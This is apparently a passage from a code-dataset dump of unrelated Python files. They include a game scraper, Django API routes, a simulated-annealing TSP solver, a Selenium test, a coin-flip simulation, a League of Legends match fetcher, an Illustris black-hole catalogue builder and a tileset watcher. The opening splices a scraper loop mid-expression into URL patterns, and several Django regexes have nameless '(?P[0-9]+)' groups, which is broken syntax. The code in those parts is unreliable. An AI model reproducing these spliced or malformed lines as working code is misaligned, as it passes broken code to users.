scrape_utils.wikipediaInfoboxScraping(possibleTitles[0])\n if(infobox is not None):\n db_utils.saveInfoboxData(infobox,gameDetails[1],platformID=GB_ID)\n if('boxart' in infobox):\n gamefaqsScraping(possibleTitles[0],gameDetails[1],False,newGame)\n else:\n gamefaqsScraping(possibleTitles[0],gameDetails[1],True,newGame)\n else:\n gamefaqsScraping(possibleTitles[0],gameDetails[1],True,newGame)\n except Exception as e:\n print(str(e))\n continue\n\ndef cleanupTitles(possibleTitles):\n finalTitles = []\n for titlecount in range(0,len(possibleTitles)):\n if(possibleTitles[titlecount] is None):\n continue\n if(len(possibleTitles[titlecount])==1 and titlecount[0-9]+)/$', map_detail),\n\n url(r'^maps/(?P[0-9]+)/vertexs/$', vertex_list),\n url(r'^maps/(?P[0-9]+)/vertexs/(?P[0-9]+)/$', vertex_detail),\n\n url(r'^maps/(?P[0-9]+)/edges/$', edge_list),\n url(r'^maps/(?P[0-9]+)/edges/(?P[0-9]+)/$', edge_detail),\n]\n\n","sub_path":"remac_portal/urls/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"604931260","text":"import matplotlib.pyplot as plt\nimport math\nimport random\n\n# TODO ADD COMENTARIOS\n\n\nclass SA:\n def __init__(self, matrix, T=-1, alpha=-1, stopping_T=-1, stopping_iter=-1):\n self.matrix = matrix\n self.N = len(matrix)\n self.T = math.sqrt(self.N) if 
T == -1 else T\n self.alpha = 0.995 if alpha == -1 else alpha\n self.stopping_temperature = 0.00000001 if stopping_T == -1 else stopping_T\n self.stopping_iter = 100000 if stopping_iter == -1 else stopping_iter\n self.iteration = 1\n\n self.nodes = [i for i in range(self.N)]\n\n self.cur_solution = self.initial_solution()\n self.initial_solution_value = self.cur_solution\n self.best_solution = list(self.cur_solution)\n\n self.cur_fitness = self.fitness(self.cur_solution)\n self.initial_fitness = self.cur_fitness\n self.best_fitness = self.cur_fitness\n\n self.fitness_list = [self.cur_fitness]\n\n def initial_solution(self):\n cur_node = random.choice(self.nodes)\n solution = [cur_node]\n free_list = list(self.nodes)\n free_list.remove(cur_node)\n while free_list:\n closest_dist = min([self.matrix[cur_node][j] for j in free_list])\n idx_rep = [i for i, item in enumerate(self.matrix[cur_node]) if item == closest_dist]\n for i in idx_rep:\n cur_node = i\n if cur_node in free_list:\n free_list.remove(cur_node)\n break\n solution.append(cur_node)\n\n return solution\n\n def fitness(self, solution):\n return round(sum([self.matrix[solution[i - 1]][solution[i]] for i in range(1, self.N)]) +\n self.matrix[solution[0]][solution[self.N - 1]], 4)\n\n def p_accept(self, candidate_fitness):\n return math.exp(-abs(candidate_fitness - self.cur_fitness) / self.T)\n\n def accept(self, candidate):\n candidate_fitness = self.fitness(candidate)\n if candidate_fitness < self.cur_fitness:\n self.cur_fitness = candidate_fitness\n self.cur_solution = candidate\n if candidate_fitness < self.best_fitness:\n self.best_fitness = candidate_fitness\n self.best_solution = candidate\n else:\n if random.random() < self.p_accept(candidate_fitness):\n self.cur_fitness = candidate_fitness\n self.cur_solution = candidate\n\n def plot_learning(self):\n plt.plot([i for i in range(len(self.fitness_list))], self.fitness_list)\n plt.ylabel('Fitness')\n plt.xlabel('Iteration')\n plt.show()\n\n def sa(self, file):\n while self.T >= self.stopping_temperature and self.iteration < self.stopping_iter:\n candidate = list(self.cur_solution)\n j = random.randint(2, self.N - 1)\n i = random.randint(0, self.N - j)\n candidate[i:(i + j)] = reversed(candidate[i:(i + j)])\n self.accept(candidate)\n self.T *= self.alpha\n self.iteration += 1\n self.fitness_list.append(self.cur_fitness)\n\n file.write('Initial Solution: {}\\n'.format(self.initial_solution_value))\n file.write('Best solution: {}\\n'.format(self.best_solution))\n file.write('Initial fitness: {}\\n'.format(self.initial_fitness))\n file.write('Best fitness obtained: {}\\n'.format(self.best_fitness))\n\n# BACKUP KKKKKKK\n\"\"\"cur_node = random.choice(self.nodes)\n # print(\"No atual: {}\".format(cur_node))\n # print(\"Dimensao da matriz: {}\".format(len(self.matrix)))\n solution = [cur_node]\n free_list = list(self.nodes)\n free_list.remove(cur_node)\n # print(free_list)\n\n while free_list:\n min_col, min_row, min_idx = 9999, 9999, 9999\n valores = []\n for j in free_list:\n if j < cur_node:\n valores.append(self.matrix[cur_node-1][j])\n if(min_row > self.matrix[cur_node-1][j]):\n min_row = self.matrix[cur_node-1][j]\n for i in range(cur_node, len(self.matrix)):\n valores.append(self.matrix[i][cur_node-1])\n if (min_col > self.matrix[i][cur_node-1]) and (i in free_list):\n min_col = self.matrix[i][cur_node-1]\n min_idx = i\n # print(\"valores: {}\".format(valores))\n if min_row < min_col:\n closest_dist = min_row\n cur_node = self.matrix[cur_node-1].index(closest_dist)\n else:\n 
closest_dist = min_col\n cur_node = min_idx\n # closest_dist = min(min([self.matrix[cur_node][j] for j in free_list[0:cur_node]]) and\n # min([self.matrix[i][cur_node] for i in range(cur_node, len(self.matrix))]))\n # print(\"Menor Distancia: {}\".format(closest_dist))\n # cur_node = self.matrix[cur_node].index(closest_dist)\n # print(\"No atual: {}\".format(cur_node))\n free_list.remove(cur_node)\n # print(free_list)\n solution.append(cur_node)\n # print(\"Solucao\")\n # print(solution)\n\n # print(\"Solucao Final\")\n # print(solution)\n return solution\"\"\"\n\n\"\"\" def initial_solution(self):\n cur_node = random.choice(self.nodes)\n solution = [cur_node]\n free_list = list(self.nodes)\n free_list.remove(cur_node)\n # print(\"Solucao Inicial -> {}\".format(solution))\n # print(\"Nos nao Visitados -> {}\".format(free_list))\n while free_list:\n closest_dist = min([self.matrix[cur_node][j] for j in free_list])\n # closest_dist = 9999\n # print(\"No atual -> {}\".format(cur_node))\n # print(self.matrix[cur_node])\n # for j in free_list:\n # closest_dist = min(closest_dist, self.matrix[cur_node][j])\n # cur_node = self.matrix[cur_node].index(closest_dist)\n # print(\"Menor Distancia -> {}\".format(closest_dist))\n idx_rep = [i for i, item in enumerate(self.matrix[cur_node]) if item == closest_dist]\n # print(\"Colunas Repetidas -> {}\".format(idx_rep))\n # print(\"Nos nao Visitados -> {}\".format(free_list))\n # print(\"Nº de nos nao Visitados -> {}\".format(len(free_list)))\n for i in idx_rep:\n # print(i)\n cur_node = i\n # print(\"{} esta na lista: {}\".format(cur_node, cur_node in free_list))\n if cur_node in free_list:\n free_list.remove(cur_node)\n break\n solution.append(cur_node)\n\n return solution\"\"\"","sub_path":"SA.py","file_name":"SA.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"451426822","text":"# instantiate class only once\n# eg: load db data\n# factory class\n\nclass Database:\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super().__new__(cls)\n return cls._instance\n\n # not right - called multiple times\n def __init__(self):\n print(\"loading db\")\n\n\nif __name__ == \"__main__\":\n d1 = Database()\n d2 = Database()\n print(d1 == d2)\n","sub_path":"PYTHON/PYTHON_DESIGN_PATTERNS/p018_singleton_allocator.py","file_name":"p018_singleton_allocator.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154165528","text":"import unittest\nfrom selenium import webdriver\nfrom pyunitreport import HTMLTestRunner\n\n\nclass NavigationTest(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=\"chromedriver.exe\")\n driver = self.driver\n driver.implicitly_wait(10)\n driver.maximize_window()\n driver.get(\"http://demo-store.seleniumacademy.com\")\n\n\n def test_browser_navigation(self):\n driver = self.driver\n\n search_field = driver.find_element_by_name(\"q\")\n search_field.clear()\n search_field.send_keys(\"platzi\")\n search_field.submit()\n\n driver.back()\n driver.forward()\n driver.refresh()\n \n def tearDown(self):\n self.driver.quit()\n\n\nif __name__ == \"__main__\":\n unittest.main( verbosity= 2, testRunner= HTMLTestRunner( output = \"reportes\", 
report_name=\"automatic-Navigation\"))","sub_path":"automatic_navigation.py","file_name":"automatic_navigation.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"343600072","text":"import numpy as np\n\n\nclass Game(object):\n def __init__(self, id, prob_head):\n self._id = id\n self._rnd = np.random\n self._rnd.seed(id)\n self._probHead = prob_head # probability of flipping a head\n self._countWins = 0 # number of wins, set to 0 to begin\n\n def simulate(self, n_of_flips):\n\n count_tails = 0 # number of consecutive tails so far, set to 0 to begin\n\n # flip the coin 20 times\n for i in range(n_of_flips):\n\n # in the case of flipping a heads\n if self._rnd.random_sample() < self._probHead:\n if count_tails >= 2: # if the series is ..., T, T, H\n self._countWins += 1 # increase the number of wins by 1\n count_tails = 0 # the tails counter needs to be reset to 0 because a heads was flipped\n\n # in the case of flipping a tails\n else:\n count_tails += 1 # increase tails count by one\n\n def get_reward(self):\n # calculate the reward from playing a single game\n return 100*self._countWins - 250\n\n\nclass SetOfGames:\n def __init__(self, prob_head, n_games):\n self._gameRewards = [] # create an empty list where rewards will be stored\n self._n_games = n_games\n\n # simulate the games\n for n in range(n_games):\n # create a new game\n game = Game(id=n, prob_head=prob_head)\n # simulate the game with 20 flips\n game.simulate(20)\n # store the reward\n self._gameRewards.append(game.get_reward())\n\n def get_ave_reward(self):\n \"\"\" returns the average reward from all games\"\"\"\n return sum(self._gameRewards) / len(self._gameRewards)\n\n def get_game_rewards(self):\n return self._gameRewards\n\n def get_prob_losing(self):\n count = 0 # count the number of times reward was negative\n for reward in self._gameRewards:\n if reward < 0:\n count += 1\n\n prob_losing = count / self._n_games\n\n return prob_losing\n\n\n","sub_path":"HW5_P1P2.py","file_name":"HW5_P1P2.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637886785","text":"import requests\nimport pdb\nimport time\nfrom pymongo import MongoClient, Connection\nclient = MongoClient('localhost', 27017) # change this to connect to different mongo client\ndb = client.local\nmatchDB = db.matchDB #replace this with your MongoDB collection name\ncurrentDate = '1427981400'\n\nfor a in matchDB.find({}):\n\tif (a['beginDate']>currentDate):\n\t\tcurrentDate = a['beginDate']\n#currentDate = '1428669000'\nargs = {'beginDate':currentDate, 'api_key': ''}\n\n#r = requests.get('https://na.api.pvp.net/api/lol/na/v4.1/game/ids/', params=args)\n#[1779697589]\n#increment by 300 to get next list\n#Idea: implement a FIFO queue, get a stack that gets a \n#No need to constantly get the matches. run a program that gets that gets matches and use mongodb.\n#Can be 1 document. 
'matchesList':listOfMatches\n# Let's write that one.\n\n\n\nwhile(True):\n\tmatchRequest = requests.get('https://na.api.pvp.net/api/lol/na/v4.1/game/ids', params=args)\n\tmatchList = matchRequest.json()\n\tmatchDocument = {'beginDate': args['beginDate'], 'matchList': matchList}\n\tduplicate = matchDB.find({'beginDate':args['beginDate']})\n\tif (duplicate.count()== 0 and 'status' not in matchList):\n\t\tmatchDB.insert(matchDocument)\n\t\tprint (args['beginDate'] + ' was added')\n\telif('status' in matchList):\n\t\tif(matchList['status']['status_code'] == 429):\n\t\t\tprint('Rate limit exceeded. Waiting .5 and resending request for ' + args['beginDate'])\n\t\t\ttime.sleep(.5)\n\t\t\tcontinue\n\t\telse:\n\t\t\tprint('The request had a status.')\n\t\t\tpdb.set_trace()\n\t\t\tcontinue\n\telse:\n\t\tprint (args['beginDate'] + ' skipped')\n\targs['beginDate'] = str(int(args['beginDate'])+300)","sub_path":"getMatches.py","file_name":"getMatches.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"25543773","text":"\"\"\"\nMAIN PURPOSE: locate all the black holes and match them to their subhalos\n\"\"\"\n\nimport h5py\nimport numpy as np\nimport os\n\nimport tqdm\n\nfrom utils.generalfuncs import get\nfrom utils import SubProcess\n\nh = 0.704\nILL_BH_PART_TYPE = 5 # BH particles correspond to \"PartType5\"\n\n\nclass Find_BHs(SubProcess):\n \"\"\"\n This class locates all of the black holes through the simulation as each snapshot. To do this, it downloads all the bh particle information from the snapshot chunks. It also downloads group catalog files for header (offset) information. It uses the snapshot python function provided in the illustris python scripts to locate which subhalos have each black hole particle. It then reads out the data to a file. 
This process is done separately for each snapshot in case downloading times out.\n\n    After this process is completed, all of the bh files for each snapshot are combined into an output file ``bhs_all_new.hdf5``.\n\n    attributes:\n\n    :param ill_run - (int) - which illustris run\n    :param dir_output - (string) - base dir_output\n    :param num_chunk_files_per_snapshot - (int) - number of chunk files per snapshot\n    :param num_groupcat_files - (int) - number of group files needed at each snapshot for offset information\n    :param first_snap_with_bhs - (int) - first snapshot where black holes exist\n    :param skip_snaps - list of (int) - snaps missing in specific illustris run\n    :param max_snap - (int) - highest snap in simulation\n\n    base_url - (str) - base url for downloading files\n    snaps - array of (int) - snapshot numbers of all subhalos with black holes in them\n    subs - array of (int) - subhalo numbers of all subhalos with black holes in them\n    needed - (boolean) - if this code needs to run\n    bhs_dict - dict - all of the black hole particle information categories contained in simulation\n\n    methods:\n\n    reset_black_holes_dict\n    download_bhs_all_snapshots\n    download_bhs_for_snapshot\n    download_snapshot_files\n    download_groupcat_header_file\n    populate_bh_dict\n    read_out_to_file_snapshot\n    delete_snapshot_files\n    combine_black_hole_files\n    delet_snap_bh_files\n    \"\"\"\n\n    def __init__(self, core, num_chunk_files_per_snapshot=512, num_groupcat_files=1):\n        super().__init__(core)\n        # self.dir_output = dir_output\n        # self.dir_input = dir_input\n        # self.ill_run = ill_run\n        # self.base_url = \"http://www.illustris-project.org/api/Illustris-%i/\" % ill_run\n        self.num_chunk_files_per_snapshot = num_chunk_files_per_snapshot\n        self.num_groupcat_files = num_groupcat_files\n        # self.first_snap_with_bhs = first_snap_with_bhs\n        # self.max_snap = max_snap\n        # self.skip_snaps = skip_snaps\n\n        # load which subs have black holes\n        # fname = os.path.join(self.dir_output, \"subs_with_bhs.hdf5\")  # \"subs_with_bhs.hdf5\"\n        fname = core.fname_subs_with_bhs()\n        with h5py.File(fname, 'r') as f:\n            self.snaps = f['Snapshot'][:]\n            self.subs = f['SubhaloID'][:]\n\n        # initialize the black hole dict\n        self.reset_black_holes_dict()\n\n        # check if this process is needed\n        fname = self.core.fname_bhs_all()\n        if os.path.exists(fname):\n            self.needed = False\n            print(\"\\t`Find_BHs` file already exists\")\n        else:\n            self.needed = True\n\n    def reset_black_holes_dict(self):\n        \"\"\"\n        The black holes dict carries all information about the black holes, including the values for each quantity, the names of all quantities, the conversion factors to familiar units, and the datatype for readout.\n        \"\"\"\n\n        self.bhs_dict = {\n            'BH_CumEgyInjection_QM': {'unit': r'$M_\\odot/(ckpc^2\\ Gyr^2)$', 'dtype': 'f', 'cf': 1e10/(0.978**2*h), 'values': []},\n            'BH_CumMassGrowth_QM': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n            'BH_Density': {'unit': r'$M_\\odot/ckpc^3$', 'dtype': 'f', 'cf': 1e10*h**2, 'values': []},\n            'BH_Hsml': {'unit': 'ckpc', 'dtype': 'f', 'cf': 1/h, 'values': []},\n            'BH_Mass': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n            'BH_Mass_bubbles': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n            'BH_Mass_ini': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n            'BH_Mdot': {'unit': r'$M_\\odot$/year', 'dtype': 'f', 'cf': 10.22, 'values': []},\n            'BH_Pressure': {'unit': r'$M_\\odot/(ckpc\\ Gyr^2)$', 'dtype': 'f', 'cf': 1e10*h**3/(0.978**2), 'values': []},\n            'BH_Progs': 
{'unit': 'None', 'dtype': 'i', 'cf': 'None', 'values': []},\n            'BH_U': {'unit': r'$(km/s)^2$', 'dtype': 'f', 'cf': 'None', 'values': []},\n            'Coordinates': {'unit': 'ckpc', 'dtype': 'f', 'cf': 1/h, 'values': []},\n            'HostHaloMass': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n            'Masses': {'unit': r'$M_\\odot$', 'dtype': 'f', 'cf': 1e10/h, 'values': []},\n            'NumTracers': {'unit': 'None', 'dtype': 'i', 'cf': 'None', 'values': []},\n            'ParticleIDs': {'unit': 'None', 'dtype': 'long', 'cf': 'None', 'values': []},\n            'Potential': {'unit': r'$(km/s)^2/a$', 'dtype': 'f', 'cf': 'None', 'values': []},\n            'SubfindDensity': {'unit': r'$M_\\odot/ckpc^3$', 'dtype': 'f', 'cf': 1e10*h**2, 'values': []},\n            'SubfindHsml': {'unit': 'ckpc', 'dtype': 'f', 'cf': 1/h, 'values': []},\n            'SubfindVelDisp': {'unit': 'km/s', 'dtype': 'f', 'cf': 'None', 'values': []},\n            'Velocities': {'unit': r'$km\\sqrt(a)/s$', 'dtype': 'f', 'cf': 'None', 'values': []},\n            'Snapshot': {'unit': 'None', 'dtype': 'i', 'cf': 'None', 'values': []},\n            'Subhalo': {'unit': 'None', 'dtype': 'i', 'cf': 'None', 'values': []}\n        }\n\n        return\n\n    def download_bhs_all_snapshots(self):\n        \"\"\"\n        This downloads all the black holes per snapshot.\n        \"\"\"\n\n        for snap in np.arange(self.first_snap_with_bhs, self.max_snap+1):\n            if snap in self.skip_snaps:\n                print('Skipped snapshot', snap)\n                continue\n\n            fname = self.core.fname_bhs_snapshot(snap)\n            if os.path.exists(fname):\n                continue\n\n            self.download_bhs_for_snapshot(snap)\n            self.reset_black_holes_dict()\n\n    def download_bhs_for_snapshot(self, snap):\n        \"\"\"\n        This downloads black holes for a specific snapshot. First, the snapshot and group catalog chunk files are needed. To do this a specific file structure is needed. See http://www.illustris-project.org/data/docs/scripts/ for info.\n        \"\"\"\n\n        dir_name = self.dir_output + '%i/' % snap\n        # if dir_name not in os.listdir(self.dir_output):\n        #     os.mkdir(dir_name)\n        if not os.path.isdir(dir_name):\n            if os.path.exists(dir_name):\n                raise RuntimeError(\"Path '{}' exists but is not a directory!\".format(dir_name))\n            os.mkdir(dir_name)\n\n        print('Begin download snapshot file black hole info for snapshot', snap)\n        self.download_snapshot_files(snap)\n        print('\\tFinished downloading snapshot file black hole info for snapshot', snap)\n\n        print('Begin download groupcat file for snapshot', snap)\n        self.download_groupcat_header_file(snap)\n        print('\\tFinished downloading groupcat file for snapshot', snap)\n\n        self.populate_bh_dict(snap)\n        self.read_out_to_file_snapshot(snap)\n\n        self.delete_snapshot_files(snap)\n\n        print('Finished gathering snapshot particle data for bhs for snapshot', snap)\n        return\n\n    def download_snapshot_files(self, snap):\n        \"\"\"\n        Download all of the chunk files for the current snapshot. Special file structure is needed. This only downloads the black hole information for memory conservation.\n        \"\"\"\n\n        if 'snapdir_%03d' % snap not in os.listdir(self.dir_output + '%i/' % snap):\n            os.mkdir(self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap)\n\n        for chunk_num in range(self.num_chunk_files_per_snapshot):\n            if 'snap_%i.%i.hdf5' % (snap, chunk_num) in os.listdir(self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap):\n                continue\n            cutout = get(self.base_url + \"files/snapshot-\" + str(snap) + '.' 
+ str(chunk_num) + '.hdf5?bhs=all')\n            os.rename(cutout, self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap + cutout)\n            if chunk_num % 10 == 0:\n                print('Snapshot chunk', chunk_num, 'out of', self.num_chunk_files_per_snapshot, 'completed.')\n        return\n\n    def download_groupcat_header_file(self, snap):\n        \"\"\"\n        Download the group catalog files which act as header files for `snapshot.py` (http://www.illustris-project.org/data/docs/scripts/ for info on this script.) Usually the first group catalog file is all that is needed for black hole particle information.\n        \"\"\"\n\n        if 'groups_%03d' % snap not in os.listdir(self.dir_output + '%i/' % snap):\n            os.mkdir(self.dir_output + '%i/' % snap + 'groups_%03d/' % snap)\n\n        for chunk_num in range(self.num_groupcat_files):\n            if 'groups_%i.%i.hdf5' % (snap, chunk_num) in os.listdir(self.dir_output + '%i/' % snap + 'groups_%03d/' % snap):\n                continue\n            cutout = get(self.base_url + \"files/groupcat-\" + str(snap) + '.' + str(chunk_num) + '.hdf5')\n            os.rename(cutout, self.dir_output + '%i/' % snap + 'groups_%03d/' % snap + cutout)\n            if chunk_num % 1 == 0:\n                print('Groupcat chunk', chunk_num, 'out of', self.num_groupcat_files, 'completed.')\n\n        return\n\n    def populate_bh_dict(self, snap):\n        \"\"\"\n        Use `snapshot.py` to find all the black hole particles in each subhalo that has a black hole in it. You need the snapshot particle chunks and group catalog header information. This tells you the black holes in each subhalo which is important for pairing a black hole to its host galaxy. These values are populated in the bh_dict.\n        \"\"\"\n        import snapshot\n\n        # figure out which subs are in this specific snapshot\n        subs_to_look_in = self.subs[self.snaps == snap]\n        for sub in subs_to_look_in:\n\n            # load bh particle info from the snapshot folder using `snapshot.py`\n            check_bhs_in_sub = snapshot.loadSubhalo(self.dir_output + '%i/' % snap, snap, sub, 5, fields=None)\n\n            # need length to fill values for subhalo and snapshot\n            length = len(check_bhs_in_sub['ParticleIDs'][:])\n            self.bhs_dict['Subhalo']['values'].append(np.full((length, ), sub, dtype=int))\n            self.bhs_dict['Snapshot']['values'].append(np.full((length, ), snap, dtype=int))\n\n            for name in self.bhs_dict:\n                if name == 'Subhalo' or name == 'Snapshot':\n                    continue\n                self.bhs_dict[name]['values'].append(check_bhs_in_sub[name])\n\n        return\n\n    def read_out_to_file_snapshot(self, snap):\n        \"\"\"\n        Concatenate the information in each list of the bh dict and then read them out to a file specific to the bhs in this snapshot.\n        \"\"\"\n        fname = self.core.fname_bhs_snapshot(snap)\n        with h5py.File(fname, 'w') as f:\n            for name in self.bhs_dict:\n                output = np.concatenate(self.bhs_dict[name]['values'], axis=0)\n\n                # multiply by a conversion factor if there is one\n                if self.bhs_dict[name]['cf'] != 'None':\n                    output = output * self.bhs_dict[name]['cf']\n\n                dset = f.create_dataset(name, data=output, dtype=output.dtype.name, chunks=True, compression='gzip', compression_opts=9)\n\n                dset.attrs['unit'] = self.bhs_dict[name]['unit']\n\n        return\n\n    def delete_snapshot_files(self, snap):\n        \"\"\"\n        Delete the snapshot chunks and group catalog chunks (header files). First check to make sure the output file is there.\n        \"\"\"\n\n        # make sure black hole file is there!!!\n        fname = self.core.fname_bhs_snapshot(snap)\n        if not os.path.exists(fname):\n            raise Exception('About to delete files when completed file (%s) is not there.' 
% fname)\n\n for f in os.listdir(self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap):\n os.remove(self.dir_output + '%i/' % snap + 'snapdir_%03d/' % snap + f)\n\n for f in os.listdir(self.dir_output + '%i/' % snap + 'groups_%03d/' % snap):\n os.remove(self.dir_output + '%i/' % snap + 'groups_%03d/' % snap + f)\n\n return\n\n def combine_black_hole_files(self):\n \"\"\"\n Combine all the ``(snap)_blackholes.hdf5`` into a single file: ``bhs_all_new.hdf5``.\n \"\"\"\n\n # reset the dict so it is ready to populate\n self.reset_black_holes_dict()\n bhs_dict = self.bhs_dict\n print([name for name in bhs_dict])\n\n # open snapshot specific files and populate dict\n for snap in tqdm.trange(self.first_snap_with_bhs, self.max_snap+1, desc='Loading BHs'):\n if snap in self.skip_snaps:\n continue\n fname = self.core.fname_bhs_snapshot(snap)\n with h5py.File(fname, 'r') as f:\n for name in bhs_dict:\n self.bhs_dict[name]['values'].append(f[name][:])\n\n # concatenate each list\n for name in self.bhs_dict:\n output = np.concatenate(self.bhs_dict[name]['values'], axis=0)\n # to be certain the items are ordered properly, place in a structured array\n # and sort by snapshot and then subhalo.\n num_snaps = len(bhs_dict['Subhalo']['values'])\n dtype = [('Snapshot', np.dtype(np.uint64)), ('Subhalo', np.dtype(np.uint64))]\n # checker = np.array([(bhs_dict['Snapshot']['values'][i], bhs_dict['Subhalo']['values'][i])\n # for i in range(num_snaps)], dtype=dtype)\n # sort = np.argsort(checker, order=('Snapshot', 'Subhalo'))\n\n snaps = []\n subs = []\n sort = {key: [] for key in bhs_dict}\n for ii in tqdm.trange(num_snaps, desc='BHs'):\n aa = bhs_dict['Snapshot']['values'][ii]\n bb = bhs_dict['Subhalo']['values'][ii]\n\n snaps = np.concatenate((snaps, aa))\n subs = np.concatenate((subs, bb))\n\n checker = np.core.records.fromarrays([snaps, subs], dtype=dtype)\n sort = np.argsort(checker, order=('Snapshot', 'Subhalo'))\n\n print('Write out to combined file.')\n fname = self.core.fname_bhs_all()\n with h5py.File(fname, 'w') as f:\n for name in bhs_dict:\n vals = np.concatenate(bhs_dict[name]['values'])\n # print(name, np.shape(vals), np.shape(sort))\n output = vals[sort]\n # print(\"\\t\", np.shape(output))\n dset = f.create_dataset(name, data=output, dtype=output.dtype.name,\n chunks=True, compression='gzip', compression_opts=9)\n dset.attrs['unit'] = bhs_dict[name]['unit']\n\n # self.delete_snap_bh_files()\n return\n\n def delet_snap_bh_files(self):\n \"\"\"\n Delete the snapshot specific bh files to conserve memory.\n \"\"\"\n\n for snap in np.arange(self.first_snap_with_bhs, self.max_snap+1):\n fname = self.core.fname_bhs_snapshot(snap)\n os.remove(fname)\n\n return\n\n\nclass Find_BHs_Odyssey(Find_BHs):\n\n def __init__(self, *args, **kwargs):\n from illpy_lib.subhalos import particle_hosts\n super().__init__(*args, **kwargs)\n\n print(\"Loading BH hosts data for all snapshots\")\n # self.bh_hosts = particle_hosts.load_bh_hosts(self.ill_run)\n self.bh_hosts = particle_hosts._load_bh_hosts_table(self.ill_run)\n print(\"\\thosts loaded\")\n return\n\n def download_snapshot_files(self, snap):\n print(\"\\t`download_snapshot_files` is not required on Odyssey\")\n return\n\n def download_groupcat_header_file(self, snap):\n print(\"\\t`download_groupcat_header_file` is not required on Odyssey\")\n return\n\n def populate_bh_dict(self, snap):\n import illpy\n # from illpy_lib.subhalos import particle_hosts\n\n # Load host subhalo information for all BHs in this snapshot\n # print(\"Loading BH hosts data for 
snapshot '{}'\".format(snap))\n # bh_hosts = particle_hosts.load_bh_hosts_snap(self.ill_run, snap)\n bh_hosts = self.bh_hosts['{:03d}'.format(snap)]\n\n # Only look at BH that have a subhhalo (those without have value '-1')\n # NOTE: some of the files seem to have binary keys... look out for that\n try:\n key = 'bh_subhalos'\n goods = (bh_hosts[key] >= 0)\n except KeyError:\n print(\"keys = \", bh_hosts.keys())\n try:\n key = b'bh_subhalos'\n goods = (bh_hosts[key] >= 0)\n except KeyError:\n raise\n\n length = np.count_nonzero(goods)\n bh_subhalos = bh_hosts[key][goods]\n # bh_ids = bh_hosts['bh_ids'][goods]\n print(\"\\t{:.4e}/{:.4e} = {:.4f} good BHs\".format(length, goods.size, length/goods.size))\n del bh_hosts\n\n # Load all BHs in this snapshot\n keys = list(self.bhs_dict.keys())\n keys.pop(keys.index('Snapshot'))\n keys.pop(keys.index('Subhalo'))\n print(\"\\tLoading all BH from snapshot '{}'\".format(snap))\n snap_bhs = illpy.snapshot.loadSubset(self.dir_input, snap, ILL_BH_PART_TYPE, fields=keys)\n print(\"\\t\\tLoaded {} BH\".format(snap_bhs['count']))\n\n self.bhs_dict['Subhalo']['values'].append(bh_subhalos)\n self.bhs_dict['Snapshot']['values'].append(np.full((length, ), snap, dtype=int))\n\n for name in self.bhs_dict:\n if name in ['Subhalo', 'Snapshot']:\n continue\n self.bhs_dict[name]['values'].append(snap_bhs[name][goods])\n\n return\n\n def delete_snapshot_files(self, snap):\n print(\"\\t`delete_snapshot_files` is not required on Odyssey\")\n return\n","sub_path":"extraction/utils/find_bhs.py","file_name":"find_bhs.py","file_ext":"py","file_size_in_byte":18354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"249127240","text":"import os\nimport subprocess\nfrom pathlib import Path\n\nimport slugid\nfrom watchgod.watcher import DefaultWatcher\n\nfrom .utils import TileSet, TileSetDB, FileMonitor\n\n\nclass TilesetsMonitor(FileMonitor):\n def __init__(self, tilsets_db, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.tilesets = tilsets_db\n\n async def run(self, store_uri=None):\n await self.tilesets.connect(store_uri=store_uri)\n await super().run()\n\n async def check_event(self, event):\n print(event.type, event.path)\n path = str(event.path.resolve())\n\n # Do nothing when the same file added(or restarted the program)\n if event.type == self.added:\n for uuid, tileset in await self.tilesets.items(datafile=path):\n path_equal = tileset['datafile'] == path\n if path_equal and TileSet.hash(path) == tileset['_hash']:\n return False\n\n # delete all recorded file with the same datafile prefix(except this modified file)\n # delete all recorded tilesets with the same datafile prefix\n elif event.type == self.modified:\n uuids = []\n for uuid, tileset in await self.tilesets.items(name=event.path.stem):\n if tileset['datafile'] != str(event.path):\n os.remove(tileset.datafile)\n uuids.append(uuid)\n await self.tilesets.remove(uuids)\n\n # delete all recorded tilesets with the same datafile path.\n elif event.type == self.deleted:\n uuids = []\n for uuid, tileset in await self.tilesets.items(datafile=path):\n uuids.append(uuid)\n await self.tilesets.remove(uuids)\n return False\n\n return True\n\n\nclass FileWatcher(DefaultWatcher):\n def should_watch_dir(self, entry):\n return False\n\n\nwatch = default_monitor = TilesetsMonitor(\n tilsets_db=TileSetDB(),\n watcher_cls=FileWatcher\n)\n\n\n@watch(r'.*\\.mcool$')\nasync def cooler(watcher, event):\n uuid = slugid.nice()\n await watcher.tilesets.update({\n uuid: 
